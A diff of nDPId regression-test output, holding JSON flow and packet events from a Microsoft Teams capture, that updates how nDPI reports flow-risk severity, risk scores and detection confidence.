-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2667,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1587041695305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695305,"pkt":"KDc3AG3IEBMx8Tl2CABFAACM2aMAADURHftdR27NwKgBBj\/Nw3QAeFT\/AAEAXCESpEKjF0z2+O91Jw0PY1cABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/3+gDcABAAAAAIACAAUo4jart22gVLrHF0JHGaI64vA9HeAKAAEUHwvEg=="}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2668,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695305,"flow_last_seen":1587041695305,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041695305,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1587041695330,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB0TLUAAEARoAHAqAEGXUduzcNgP8wAYAttAQEARCESpEJpQfrkOEmJN4IqUAiAcAAEAAAABwAgAAgAAR7efFXKj4A3AAQAAAACgDYABAAAAAEACAAUlU+ROI4McMZBUuZSU8\/gWyGrdx6AKAAE+OcqVw=="}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2671,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1587041695330,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMkXkAAEARWyXAqAEGXUduzcNgP8wAeAk2AAEAXCESpEL9LF5WbGc54yQwO\/cABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAU1YbVJoGA61aUBne1Qcfqud7BOGOAKAAEmnK+Jw=="}
 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1587041695330,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"ts_msec":1587041695330,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB0gkYAAEARanDAqAEGXUduzcN0P80AYEblAQEARCESpEKjF0z2+O91Jw0PY1eAcAAEAAAABwAgAAgAAR7ffFXKj4A3AAQAAAACgDYABAAAAAEACAAUNbjIzLk8Htcx5rlGPdUzB6Mtkf+AKAAECmy4uA=="}
@@ -477,13 +477,13 @@
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1587041695421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1587041695421,"pkt":"KDc3AG3IEBMx8Tl2CABFAACYUPwAAGwRCyM0cvwVwKgBBg2Yw3QAhCaSAAEAaCESpEK59F1PLtIJs2rQCYoABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACGUfNM4ueRX8gDcABAAAAAIACAAUDNg3puCxSSnyiCvs+zLb4wfWy9WAKAAEDuovdw=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1587041695422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1587041695422,"pkt":"KDc3AG3IEBMx8Tl2CABFAACY4AMAAG0Reyg0cvwIwKgBBg2Xw2AAhBBVAAEAaCESpEKBJ1p+KLNk2I89FPkABgAJRlkzMjpvNS9JAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACN6qKWcI9wj8gDcABAAAAAIACAAUyAS6wVT6GpHQ1gnRXe5kbQ9LDuWAKAAEokvlFA=="}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1587041695432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1587041695432,"pkt":"EBMx8Tl2KDc3AG3ICABFAACA0aoAAEARtpnAqAEGNHL8CMNgDZcAbO2O\/xAAYN6qKWcI9wj8AQEARCESpEKBJ1p+KLNk2I89FPmAcAAEAAAABwAgAAgAASyFFWBYSoA3AAQAAAACgDYABAAAAAEACAAUmYtT\/sgffZE\/GPjMTGRSk5h1N+2AKAAEPqesNg=="}
 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2688,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1587041695433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1587041695433,"pkt":"EBMx8Tl2KDc3AG3ICABFAACAFs8AAEARcWjAqAEGNHL8FcN0DZgAbMYz\/xAAYGUfNM4ueRX8AQEARCESpEK59F1PLtIJs2rQCYqAcAAEAAAABwAgAAgAASyKFWBYV4A3AAQAAAACgDYABAAAAAEACAAUb+d2GMvNHhGxBtT1sjJNLSVYAvSAKAAEqoFJXQ=="}
-00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="}
 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041695611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
@@ -496,103 +496,103 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"}
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041697412,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041697611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2774,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1587041697673,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1587041697673,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA4akMAADUBjR9dR27NwKgBBgMDcBsAAAAARQAAWp4wAAAyEVygwKgBBl1Hbs3DdD\/NAEaJWQ=="}
-00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00711{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
